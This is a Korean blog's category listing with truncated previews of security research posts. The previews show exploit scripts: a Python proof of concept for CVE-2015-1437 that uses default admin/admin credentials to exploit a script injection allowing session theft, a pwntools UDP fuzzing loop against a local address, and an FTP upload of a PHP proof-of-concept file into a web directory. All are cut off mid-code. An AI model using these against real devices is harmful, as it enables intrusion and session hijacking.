목록프로그래밍 (73)
Self-Improvement
1. Basic 방식 # -*- coding: cp949 -*- # CVE : CVE-2015-1437 # Description : # result_of_get_changed_status.asp의 flag 파라미터에서 스크립트 구문이 동작되어 세션 탈취 등을 할 수 있는 취약점 # 실제 기기 대상 ''' ----REQUEST---- ----RESPONSE---- ''' import requests import sys def packet(target, port): try: #Login -- Default admin/admin headers = {'Authorization' : 'Basic YWRtaW46YWRtaW4='} s = requests.Session() url = 'http://'+target+'..
보호되어 있는 글입니다.
보호되어 있는 글입니다.
보호되어 있는 글입니다.
보호되어 있는 글입니다.
보호되어 있는 글입니다.
from pwn import * p=remote("192.168.1.7",3702, typ='udp') for i in range(0x99): j=chr(i) p.send(j) import socket import struct from pwn import * p32 = lambda x : struct.pack("
import requests from ftplib import FTP #stablish connection with FTP server host_ip = "127.0.0.1" ftp = FTP() ftp.connect(host=host_ip, port=9000) ftp.login("admin", "admin") data = [] #create PHP poc file poc_php_file = open("poc.php", "w+") poc_php_file.write("") poc_php_file.close() #upload PHP poc file php_file = open("poc.php", "rb") ftp.cwd('/web/public') ftp.storbinary("STOR write_file.ph..
보호되어 있는 글입니다.